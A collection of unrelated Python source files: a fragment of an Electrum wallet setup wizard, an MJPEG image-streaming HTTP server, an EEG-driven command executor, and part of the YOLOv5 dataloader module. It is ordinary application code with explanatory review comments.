            def task():
                # Runs on a background thread; reports back via a Qt signal.
                wallet.wait_until_synchronized()
                if wallet.is_found():
                    msg = _("Recovery successful")
                else:
                    msg = _("No transactions found for this seed")
                self.synchronized_signal.emit(msg)
            self.synchronized_signal.connect(self.show_message)
            t = threading.Thread(target = task)
            t.daemon = True
            t.start()
        else:
            msg = _("This wallet was restored offline. It may "
                    "contain more addresses than displayed.")
            self.show_message(msg)

    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        self.confirm(message, title)

    def confirm(self, message, title):
        label = WWLabel(message)
        vbox = QVBoxLayout()
        vbox.addWidget(label)
        self.exec_layout(vbox, title)

    @wizard_dialog
    def action_dialog(self, action, run_next):
        self.run(action)

    def terminate(self):
        self.accept_signal.emit()

    def waiting_dialog(self, task, msg):
        # Blocks the wizard while `task` runs on a worker thread.
        self.please_wait.setText(msg)
        self.refresh_gui()
        t = threading.Thread(target = task)
        t.start()
        t.join()

    @wizard_dialog
    def choice_dialog(self, title, message, choices, run_next):
        # `choices` is a list of (value, label) pairs; returns the chosen value.
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        clayout = ChoicesLayout(message, c_titles)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, title)
        action = c_values[clayout.selected_index()]
        return action

    def query_choice(self, msg, choices):
        """called by hardware wallets"""
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, '')
        return clayout.selected_index()

    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning=''):
        # Single-line validated input; Next stays disabled until `test` passes.
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)
        def f(text):
            self.next_button.setEnabled(test(text))
        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))
        self.exec_layout(vbox, title, next_enabled=test(default))
        return ' '.join(line.text().split())

    @wizard_dialog
    def show_xpub_dialog(self, xpub, run_next):
        msg = ' '.join([
            _("Here is your master public key."),
            _("Please share it with your cosigners.")
        ])
        vbox = QVBoxLayout()
        layout = SeedLayout(xpub, title=msg, icon=False)
        vbox.addLayout(layout.layout())
        self.exec_layout(vbox, _('Master Public Key'))
        return None

    def init_network(self, network):
        """Ask how to connect to a server (auto vs manual selection)."""
        message = _("Electrum communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Electrum "
                    "pick one at random.  However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)

    @wizard_dialog
    def multisig_dialog(self, run_next):
        """m-of-n slider page; returns the chosen (m, n) pair."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require %d signatures')%m)
            cw.set_m(m)
        def on_n(n):
            n_label.setText(_('From %d cosigners')%n)
            cw.set_n(n)
            # m can never exceed n.
            m_edit.setMaximum(n)
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
weboutput.py | # author: SIANA Systems
# website: https://www.siana-systems.com
from socketserver import ThreadingMixIn
from queue import Queue
from collections import deque
from threading import Thread
from http import HTTPStatus
from http.server import (
BaseHTTPRequestHandler,
HTTPServer
)
import numpy, cv2, time, urllib
from PIL import Image
class CameraHandler(BaseHTTPRequestHandler):
    """Handles HTTP requests from the clients. For this particular case,
    server will return an image stream (.mjpg) when a client sends a GET
    request
    """
    # Class-level registries shared by every handler instance (one instance is
    # created per request): name -> latest still image (cv2/numpy array), and
    # name -> Queue of frames feeding an MJPEG stream.
    image_queue = {}
    stream_queue = {}

    def do_GET(self):
        """Function called when the web browser generates a GET request
        """
        decoded_path = urllib.parse.unquote(self.path)
        if(decoded_path == '/'):
            # Root path. Shows a list of all files
            self.send_response(HTTPStatus.OK)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            self.wfile.write(CameraHandler.populate_files().encode('utf-8'))
        if decoded_path[1:] in CameraHandler.image_queue:
            # Selected an existing picture
            self.send_response(HTTPStatus.OK)
            self.send_header('Content-type', 'image/jpeg')
            self.end_headers()
            # send image...
            _, jpg = cv2.imencode('.jpg', CameraHandler.image_queue[decoded_path[1:]])
            self.wfile.write(jpg.tobytes())
        if decoded_path[1:] in CameraHandler.stream_queue:
            # Start mjpg stream
            self.send_response(200)
            # http header...
            self.send_header('Age', 0)
            self.send_header('Cache-Control', 'no-cache, private')
            self.send_header('Pragma', 'no-cache')
            self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=frame')
            self.end_headers()
            # init blank image (first frame)
            previous_image = numpy.zeros((640, 480, 3), numpy.uint8)
            # stream frames...
            # NOTE(review): write errors are swallowed below, so this loop never
            # exits even after the client disconnects -- confirm intent.
            while True:
                try:
                    dequeued_image = CameraHandler.stream_queue[decoded_path[1:]].get(timeout=1000)
                except:  # NOTE(review): bare except -- queue.Empty is the expected case here
                    # No fresh frame in time: re-send the previous one.
                    dequeued_image = previous_image
                try:
                    # convert cv2 image to jpeg
                    _, jpg = cv2.imencode('.JPG', dequeued_image)
                    # send frame http header...
                    self.wfile.write("--frame\r\n".encode("utf-8"))
                    self.send_header('Content-type', 'image/jpeg')
                    self.send_header('Content-length', str(jpg.size))
                    self.end_headers()
                    # send frame jpeg data...
                    # NOTE(review): ndarray.tostring() is deprecated in numpy;
                    # tobytes() is the modern spelling (as used above).
                    self.wfile.write(jpg.tostring())
                    self.wfile.write(b'\r\n')
                except (BrokenPipeError, ConnectionResetError):
                    # client closed connection => nothing to do!
                    pass
                previous_image = dequeued_image

    # The helpers below are written without `self` and are invoked via the
    # class (CameraHandler.populate_files(), ...), so they behave as
    # static-style helpers operating on the class-level registries.
    def populate_files():
        """Creates an HTML list where each element corresponds to an
        image or video output
        Returns:
            HTML formatted string with the list with elements
        """
        image_list_html = "<ul>"
        for frame in CameraHandler.image_queue:
            image_list_html += "<li>frame: <a href=\"/{}\">{}</a></li>".format(
                frame,
                frame
            )
        for stream in CameraHandler.stream_queue:
            image_list_html += "<li>stream: <a href=\"/{}\">{}</a></li>".format(
                stream,
                stream
            )
        image_list_html += "</ul>"
        return image_list_html

    def put_image(name, image):
        """Enqueues a frame that will be shown on the HTTP server
        Args:
            name (str): name the still image is served under
            image (array): Bitmap image
        """
        CameraHandler.image_queue[name] = image

    def stream_images(name, image):
        """Enqueues a frame in the video stream that will be shown
        on the HTTP server
        Args:
            name (str): Title of the stream to show
            image (array): Bitmap image
        """
        if name not in CameraHandler.stream_queue:
            CameraHandler.stream_queue[name] = Queue()
        # dump old frames so slow consumers don't lag far behind the camera...
        while CameraHandler.stream_queue[name].qsize() > 3:
            CameraHandler.stream_queue[name].get()
        CameraHandler.stream_queue[name].put(image)
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """HTTP server that serves each request on its own thread.

    ThreadingMixIn overrides request processing so every incoming connection
    gets a dedicated thread; this matters here because an MJPEG stream request
    never returns, and would otherwise block all other clients.
    """
class HttpStreamOutput:
    """Helper class that implements a HTTP server. It wraps
    methods around the CameraHandler static class to ease the interaction
    between the WebOutput and the static class.
    """

    DEFAULT_HOST_ADDRESS = '0.0.0.0'
    DEFAULT_PORT = 8080

    def __init__(self,
                 address: str = DEFAULT_HOST_ADDRESS,
                 port: int = DEFAULT_PORT
                 ):
        """Initializes the server thread (does not start serving yet).

        Args:
            address (str, optional): Interface to bind. Defaults to DEFAULT_HOST_ADDRESS.
            port (int, optional): TCP port to bind. Defaults to DEFAULT_PORT.
        """
        self._server = ThreadedHTTPServer(
            (address, port),
            CameraHandler
        )
        # Daemon thread so the interpreter is not kept alive just to serve
        # HTTP. Thread.setDaemon() is deprecated since Python 3.10; the
        # daemon keyword is the supported spelling.
        self._server_thread = Thread(
            target=self._server.serve_forever,
            daemon=True,
        )

    def startServer(self):
        """Starts serving in the background thread."""
        self._server_thread.start()

    def stopServer(self):
        """Stops serving by closing the listening socket."""
        self._server.socket.close()

    def putImage(self, name, frame):
        """Sends a frame to the HTTP image display.

        Args:
            name (str): Title of the frame to show
            frame (array): Bitmap image
        """
        self._server.RequestHandlerClass.put_image(name, frame)

    def streamImage(self, name, frame):
        """Sends a frame to the HTTP video stream.

        Args:
            name (str): Title of the stream to show
            frame (array): Bitmap image
        """
        self._server.RequestHandlerClass.stream_images(name, frame)
class WebOutput(HttpStreamOutput):
    """Concrete class that implements a media output for devices that
    don't support visual screen output but have a LAN connection.
    For this purpose, the WebOutput class uses an HTTP server that renders
    both images and video streams using a fixed address and port.
    """

    def __init__(self, port: int):
        """Initializes and starts the HTTP server.

        Args:
            port (int): HTTP server port
        """
        HttpStreamOutput.__init__(self, port=port)
        self.startServer()

    def show(self, name: str, frame):
        """Displays the frame on the server. This method creates a new
        list entry that can be accessed in the HTTP server. By clicking
        on this list entry, the image will be displayed in the web browser.

        Args:
            name (str): Title of the frame to show
            frame (array): Bitmap image
        """
        self.putImage(name, frame)

    def stream(self, name: str, frame):
        """Sends a frame to the web server video stream. This method creates
        a new list entry that can be accessed in the HTTP server. The name
        serves as a reference to the video stream queue, and the frames are
        enqueued to the video stream queue.

        Args:
            name (str): Title of the stream to show
            frame (array): Bitmap image
        """
        self.streamImage(name, frame)

    def __del__(self):
        """Destroys and finishes all the resources associated with
        the screen output. In this case, stops the serving.
        """
        self.stopServer()

    def waitForKey(self, delay: int = 0):
        """Waits for a pressed key. Waits indefinitely when delay is 0,
        otherwise waits `delay` milliseconds.

        Args:
            delay (int): Delay in milliseconds. 0 is the special value
                that means "forever".
        """
        if not delay:
            input()
        else:
            time.sleep(delay / 1000)

    def clear(self):
        """Remove all images and video stream entries on the webserver."""
        CameraHandler.image_queue.clear()
        # Fix: previously only image_queue was cleared, so stale stream
        # entries stayed listed on the index page despite the docstring.
        CameraHandler.stream_queue.clear()
Warden.py | from kernel.Interfaces.IConsumer import IConsumer
from kernel.Interfaces.IProducer import IProducer
from kernel.Interfaces.IStoreManager import IStoreManager
from kernel.Neural import Neural
import kernel
from ctypes import c_int32
import multiprocessing
import numpy as np
import subprocess
class Warden:
    """
    This component is the central component that manages all dependencies among others.
    """

    def __init__(self, producer: IProducer, consumer: IConsumer, store_manager: IStoreManager):
        """
        Constructor that initializes entity.

        :param producer: Producer class that creates data; instantiated with this Warden.
        :param consumer: Consumer class that consumes data; instantiated with this Warden.
        :param store_manager: Store manager class to get and set data.
        """
        self.__producer__ = producer(self)
        self.__consumer__ = consumer(self)
        self.__store_manager__ = store_manager()
        self.__queue__ = multiprocessing.Queue()
        self.__event__ = multiprocessing.Event()
        self.__external_event__ = multiprocessing.Event()
        self.__internal_event__ = multiprocessing.Event()
        # NOTE(review): these start as multiprocessing.Value wrappers but the
        # setters below replace them with plain ints -- confirm intended usage.
        self.__command_id__: multiprocessing.Value = multiprocessing.Value(c_int32, 0)
        self.__user_id__: multiprocessing.Value = multiprocessing.Value(c_int32, 0)
        self.__threshold__ = kernel.get_threshold()
        self.__mode__ = 0  # 0 = train, 1 = inference
        self.__neural__ = None
        self.__commands__ = None  # inference only: command id -> [action, *parameters]

    def set_train_mode(self):
        """
        Set mode as train.
        """
        self.__mode__ = 0

    def set_inference_mode(self):
        """
        Sets mode as inference.
        """
        self.__mode__ = 1

    def is_train_mode(self):
        """
        Tells if actual mode is train.
        """
        return self.__mode__ == 0

    def is_inference_mode(self):
        """
        Tells if actual mode is inference.
        """
        return self.__mode__ == 1

    def get_active_command(self):
        """
        Get the active command, the command that is being trained.

        :return: The command in training mode.
        """
        return self.__command_id__

    def set_active_command(self, command_id):
        """
        Set the active command, the command that is going to be trained.

        :param command_id: Command id to be trained.
        """
        self.__command_id__ = command_id

    def get_active_user(self):
        """
        Get the user that is being trained.

        :return: The user in training mode.
        """
        return self.__user_id__

    def set_active_user(self, user_id):
        """
        Set the user that is in active mode.

        :param user_id: The user in training mode.
        """
        self.__user_id__ = user_id

    def lock(self):
        """
        Locks the producer-consumer relation.
        """
        self.__consumer__.lock()

    def wait_internal(self):
        """
        Waits until the internal event is signaled.
        """
        self.__internal_event__.wait()

    def lock_internal_process(self):
        """
        Locks a process waiting on the internal event.
        """
        self.__internal_event__.clear()

    def unlock_internal_process(self):
        """
        Unlocks processes waiting on the internal event.
        """
        self.__internal_event__.set()

    def wait_process(self):
        """
        Waits until the external event is signaled.
        """
        self.__external_event__.wait()

    def lock_external_process(self):
        """
        Locks a process waiting on the external event.
        """
        self.__external_event__.clear()

    def unlock_external_process(self):
        """
        Unlocks processes waiting on the external event.
        """
        self.__external_event__.set()

    def start(self):
        """
        Starts Warden and its associated processes; execution differs between
        train and inference modes.
        """
        print("Arrancando componente productor")
        producer_process = multiprocessing.Process(target=self.__producer__.start)
        producer_process.daemon = True
        producer_process.start()
        print("Arrancando componente consumidor")
        if self.is_inference_mode():
            print("Cargando datos del modelo")
            self.__store_manager__.refresh()
            self.__neural__ = Neural(self.__store_manager__)
            self.__neural__.load_model(self.__user_id__)
            print("Cargando datos del usuario")
            user = self.__store_manager__.get_user(self.__user_id__)
            commands = user.get_commands()
            self.__commands__ = {}
            for command in commands:
                # Store [action, *parameters] so the list can be run directly
                # as a subprocess argv.
                parameters = command.get_parameters()
                if parameters is None:
                    parameters = [command.get_action()]
                else:
                    parameters.insert(0, command.get_action())
                self.__commands__[command.get_id()] = parameters
            # In inference the consumer runs in this process.
            self.__consumer__.start()
        else:
            self.__event__.clear()
            consumer_process = multiprocessing.Process(target=self.__consumer__.start)
            consumer_process.daemon = True
            consumer_process.start()

    def execute(self, data):
        """
        Executes the command inferred by the neural network.

        :param data: Data used for neural network to infer command.
        """
        try:
            command_id = self.__neural__.predict(data) + 1
            # Fix: the original indexed the int id ((command_id)[0] raised
            # TypeError on every call, silently swallowed below, so no command
            # ever ran) and compared the id against len() even though commands
            # are keyed by arbitrary ids. Membership is the correct guard.
            if command_id in self.__commands__:
                subprocess.run(self.__commands__[command_id])
        except Exception as e:
            print(e)

    def train(self):
        """
        Executes the train mode: gathers every stored command's EEG data for
        the active user, trains the network, and saves the model when the
        success rate clears the configured threshold.
        """
        print("Preparando ML")
        self.__store_manager__.refresh()
        self.__neural__ = Neural(self.__store_manager__)
        user = self.__store_manager__.get_user(self.__user_id__)
        data = None
        target = np.array([])
        cmds = user.get_commands()
        for cmd in cmds:
            cmd = self.__store_manager__.load_command(self.__user_id__, cmd)
            if cmd is not None:
                d_res = cmd.get_eeg()
                if d_res is not None:
                    # np.int was removed in NumPy 1.24; the builtin int is the
                    # documented replacement (it is what np.int aliased).
                    t_res = np.repeat(cmd.get_id(), len(d_res)).astype(int)
                    if data is None:
                        data = d_res
                    else:
                        if len(data.shape) == 1:
                            data = data[0].reshape(1, -1)
                        try:
                            data = np.append(data, d_res, axis=0)
                        except Exception:
                            print("exp")
                    target = np.concatenate((target, t_res), axis=0).astype(int)
        print("Empezando ML")
        self.__neural__.process(data, target)
        self.__neural__.create_softmax()
        train_loss = self.__neural__.reset_and_train_network(False)
        predicted_values, test_loss = self.__neural__.evaluate_network(self.__neural__.__data_train__,
                                                                       self.__neural__.__target_train__)
        percentage = self.__neural__.compute_success(self.__neural__.__target_train__, predicted_values) * 100
        print("Se ha conseguido un {0:.2f}% de acierto con un error de {1:.2f}% y una perdida de {2:.2f}.".format(
            percentage, test_loss, min(train_loss)))
        if percentage > self.__threshold__:
            print("Se va a guardar este modelo.")
            self.__neural__.save_model(self.__user_id__)
        else:
            print("La calidad es demasiado baja y se va a descartar este modelo.")
        self.unlock_external_process()

    def stop(self):
        """
        Stops Warden and all processes.
        """
        self.__producer__.stop()
        self.__consumer__.stop()
|
datasets.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
from zipfile import ZipFile
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import (
Albumentations,
augment_hsv,
copy_paste,
letterbox,
mixup,
random_perspective,
)
from utils.general import (
DATASETS_DIR,
LOGGER,
NUM_THREADS,
check_dataset,
check_requirements,
check_yaml,
clean_str,
cv2,
segments2boxes,
xyn2xy,
xywh2xyxy,
xywhn2xyxy,
xyxy2xywhn,
)
from utils.torch_utils import torch_distributed_zero_first
def resize_image(image, long_size, interpolation=cv2.INTER_LINEAR):
    """Resize `image` so its longer side equals `long_size`, keeping aspect ratio.

    Args:
        image: HxW or HxWxC numpy image (grayscale now accepted as well).
        long_size (int): Target length of the longer image side.
        interpolation: OpenCV interpolation flag.

    Returns:
        The resized image.
    """
    # shape[:2] works for both 2-D (grayscale) and 3-D (color) arrays; the
    # original 3-way unpack raised ValueError on single-channel images.
    height, width = image.shape[:2]
    # set target image size
    ratio = long_size / max(height, width)
    target_h, target_w = int(height * ratio), int(width * ratio)
    image = cv2.resize(image, (target_w, target_h), interpolation=interpolation)
    return image
def numpy_img(img, size):
    """Read an image file from disk and scale its longer side to `size`."""
    loaded = cv2.imread(img)
    return resize_image(loaded, size)
def file_to_torch(img, device):
    """Convert a BGR uint8 HWC image array into a normalized NCHW float tensor.

    Returns a tensor of shape (1, C, H, W) with values in [0, 1] on `device`.
    """
    rgb = img[:, :, ::-1]                 # BGR -> RGB
    chw = rgb.transpose(2, 0, 1)          # HWC -> CHW
    batched = chw[np.newaxis, :, :, :]    # prepend batch dimension
    tensor = torch.from_numpy(batched.copy())
    return tensor.float().div(255.0).to(device)
# Parameters
HELP_URL = "https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data"
IMG_FORMATS = (
    "bmp",
    "dng",
    "jpeg",
    "jpg",
    "mpo",
    "png",
    "tif",
    "tiff",
    "webp",
)  # include image suffixes
VID_FORMATS = (
    "asf",
    "avi",
    "gif",
    "m4v",
    "mkv",
    "mov",
    "mp4",
    "mpeg",
    "mpg",
    "ts",
    "wmv",
)  # include video suffixes
BAR_FORMAT = "{l_bar}{bar:10}{r_bar}{bar:-10b}"  # tqdm bar format
LOCAL_RANK = int(
    os.getenv("LOCAL_RANK", -1)
)  # https://pytorch.org/docs/stable/elastic/run.html
# Get orientation exif tag
# Scan Pillow's EXIF tag table once to find the numeric id whose name is
# "Orientation"; exif_size() below reads this module-level `orientation`.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == "Orientation":
        break
def get_hash(paths):
    """Return one MD5 hex digest identifying a list of file/dir paths.

    The digest covers the combined on-disk size of the existing paths plus
    the concatenated path strings, so it changes when files grow/shrink or
    the path list changes.
    """
    total_size = sum(os.path.getsize(p) for p in paths if os.path.exists(p))
    digest = hashlib.md5(str(total_size).encode())
    digest.update("".join(paths).encode())
    return digest.hexdigest()
def exif_size(img):
    """Return a PIL image's (width, height), swapped when EXIF marks a 90/270 rotation."""
    width, height = img.size  # PIL reports (width, height)
    try:
        exif = dict(img._getexif().items())
        # Orientation codes 6 and 8 both mean the stored pixels are rotated
        # a quarter turn, so the logical width/height are transposed.
        if exif[orientation] in (6, 8):
            width, height = height, width
    except Exception:
        # Missing/invalid EXIF: fall back to the raw size.
        pass
    return width, height
def exif_transpose(image):
    """
    Transpose a PIL image accordingly if it has an EXIF Orientation tag.
    Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
    :param image: The image to transpose.
    :return: An image.
    """
    exif = image.getexif()
    orientation = exif.get(0x0112, 1)  # default 1
    if orientation <= 1:
        # No rotation recorded -- nothing to do.
        return image
    # Map each EXIF orientation code onto the PIL transpose op that undoes it.
    method = {
        2: Image.FLIP_LEFT_RIGHT,
        3: Image.ROTATE_180,
        4: Image.FLIP_TOP_BOTTOM,
        5: Image.TRANSPOSE,
        6: Image.ROTATE_270,
        7: Image.TRANSVERSE,
        8: Image.ROTATE_90,
    }.get(orientation)
    if method is not None:
        image = image.transpose(method)
        # The rotation has been applied to the pixels, so drop the tag.
        del exif[0x0112]
        image.info["exif"] = exif.tobytes()
    return image
def create_dataloader(
    path,
    imgsz,
    batch_size,
    stride,
    single_cls=False,
    hyp=None,
    augment=False,
    cache=False,
    pad=0.0,
    rect=False,
    rank=-1,
    workers=8,
    image_weights=False,
    quad=False,
    prefix="",
    shuffle=False,
):
    """Build a LoadImagesAndLabels dataset and its DataLoader.

    Returns:
        (loader, dataset): `loader` is an InfiniteDataLoader unless
        image_weights is set (only plain DataLoader allows the attribute
        updates that image-weighted sampling performs between epochs).
    """
    if rect and shuffle:
        # Rectangular batching requires images sorted by aspect ratio.
        LOGGER.warning(
            "WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False"
        )
        shuffle = False
    with torch_distributed_zero_first(rank):  # init dataset *.cache only once if DDP
        dataset = LoadImagesAndLabels(
            path,
            imgsz,
            batch_size,
            augment=augment,  # augmentation
            hyp=hyp,  # hyperparameters
            rect=rect,  # rectangular batches
            cache_images=cache,
            single_cls=single_cls,
            stride=int(stride),
            pad=pad,
            image_weights=image_weights,
            prefix=prefix,
        )
    batch_size = min(batch_size, len(dataset))
    nd = torch.cuda.device_count()  # number of CUDA devices
    nw = min(
        [os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]
    )  # number of workers
    sampler = (
        None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
    )
    loader = (
        DataLoader if image_weights else InfiniteDataLoader
    )  # only DataLoader allows for attribute updates
    return (
        loader(
            dataset,
            batch_size=batch_size,
            shuffle=shuffle and sampler is None,
            num_workers=nw,
            sampler=sampler,
            pin_memory=True,
            collate_fn=LoadImagesAndLabels.collate_fn4
            if quad
            else LoadImagesAndLabels.collate_fn,
        ),
        dataset,
    )
class InfiniteDataLoader(dataloader.DataLoader):
    """Dataloader that reuses workers

    Uses same syntax as vanilla DataLoader
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # batch_sampler is effectively read-only on DataLoader, so bypass
        # __setattr__ to wrap it in a never-ending sampler; combined with the
        # single persistent iterator below, worker processes are never torn
        # down between epochs.
        object.__setattr__(self, "batch_sampler", _RepeatSampler(self.batch_sampler))
        self.iterator = super().__iter__()

    def __len__(self):
        # One epoch's length: the underlying (finite) sampler's length.
        return len(self.batch_sampler.sampler)

    def __iter__(self):
        # Yield exactly one epoch of batches from the persistent iterator.
        for i in range(len(self)):
            yield next(self.iterator)
class _RepeatSampler:
"""Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
    # YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
    def __init__(self, path, img_size=640, stride=32, auto=True):
        """Collect image/video paths from `path` (glob pattern, directory, or file).

        Raises:
            Exception: if `path` does not exist.
            AssertionError: if no supported media files are found.
        """
        p = str(Path(path).resolve())  # os-agnostic absolute path
        if "*" in p:
            files = sorted(glob.glob(p, recursive=True))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, "*.*")))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception(f"ERROR: {p} does not exist")
        images = [x for x in files if x.split(".")[-1].lower() in IMG_FORMATS]
        videos = [x for x in files if x.split(".")[-1].lower() in VID_FORMATS]
        ni, nv = len(images), len(videos)
        self.img_size = img_size
        self.stride = stride
        self.files = images + videos  # images first, then videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv
        self.mode = "image"
        self.auto = auto
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nf > 0, (
            f"No images or videos found in {p}. "
            f"Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}"
        )

    def __iter__(self):
        """Reset the file cursor and return self."""
        self.count = 0
        return self

    def __next__(self):
        """Return (path, letterboxed CHW RGB image, original BGR image, capture, log string)."""
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]
        if self.video_flag[self.count]:
            # Read video
            self.mode = "video"
            ret_val, img0 = self.cap.read()
            while not ret_val:
                # Current video exhausted -> advance to the next file.
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()
            self.frame += 1
            s = f"video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: "
        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, f"Image Not Found {path}"
            s = f"image {self.count}/{self.nf} {path}: "
        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)
        return path, img, img0, self.cap, s

    def new_video(self, path):
        """Open `path` with OpenCV and reset the per-video frame counter."""
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    # YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
    def __init__(self, pipe="0", img_size=640, stride=32):
        """Open a local webcam (numeric device string) or a capture pipeline/URL.

        Args:
            pipe (str): device index as a string ("0") or a pipeline/URL string.
            img_size (int): target long side used for letterboxing.
            stride (int): model stride used for letterbox padding.
        """
        self.img_size = img_size
        self.stride = stride
        # int() replaces the original eval(): it never executes user input as
        # code, and unlike eval() it also accepts zero-padded digit strings
        # such as "01" (eval("01") is a SyntaxError in Python 3).
        self.pipe = int(pipe) if pipe.isnumeric() else pipe
        self.cap = cv2.VideoCapture(self.pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        """Reset the frame counter and return self."""
        self.count = -1
        return self

    def __next__(self):
        """Grab, mirror, and letterbox one webcam frame."""
        self.count += 1
        if cv2.waitKey(1) == ord("q"):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration
        # Read frame
        ret_val, img0 = self.cap.read()
        img0 = cv2.flip(img0, 1)  # flip left-right
        # Print
        assert ret_val, f"Camera Error {self.pipe}"
        img_path = "webcam.jpg"
        s = f"webcam {self.count}: "
        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]
        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)
        return img_path, img, img0, None, s

    def __len__(self):
        # Length is unknown for a live camera; 0 by convention.
        return 0
class LoadStreams:
    # YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
    def __init__(self, sources="streams.txt", img_size=640, stride=32, auto=True):
        """Open every stream source and start one daemon reader thread per stream.

        Args:
            sources: a text file listing one URL per line, or a single URL /
                numeric webcam-id string.
            img_size (int): target long side used for letterboxing.
            stride (int): model stride used for letterbox padding.
            auto (bool): passed through to letterbox (minimal rectangle).
        """
        self.mode = "stream"
        self.img_size = img_size
        self.stride = stride
        if os.path.isfile(sources):
            with open(sources) as f:
                sources = [
                    x.strip() for x in f.read().strip().splitlines() if len(x.strip())
                ]
        else:
            sources = [sources]
        n = len(sources)
        self.imgs, self.fps, self.frames, self.threads = (
            [None] * n,
            [0] * n,
            [0] * n,
            [None] * n,
        )
        self.sources = [clean_str(x) for x in sources]  # clean source names for later
        self.auto = auto
        for i, s in enumerate(sources):  # index, source
            # Start thread to read frames from video stream
            st = f"{i + 1}/{n}: {s}... "
            if urlparse(s).hostname in (
                "www.youtube.com",
                "youtube.com",
                "youtu.be",
            ):  # if source is YouTube video
                check_requirements(("pafy", "youtube_dl==2020.12.2"))
                import pafy

                s = pafy.new(s).getbest(preftype="mp4").url  # YouTube URL
            # NOTE(review): eval() on a numeric source executes input as code;
            # int(s) would be the safer equivalent -- confirm before changing.
            s = eval(s) if s.isnumeric() else s  # i.e. s = '0' local webcam
            cap = cv2.VideoCapture(s)
            assert cap.isOpened(), f"{st}Failed to open {s}"
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS)  # warning: may return 0 or nan
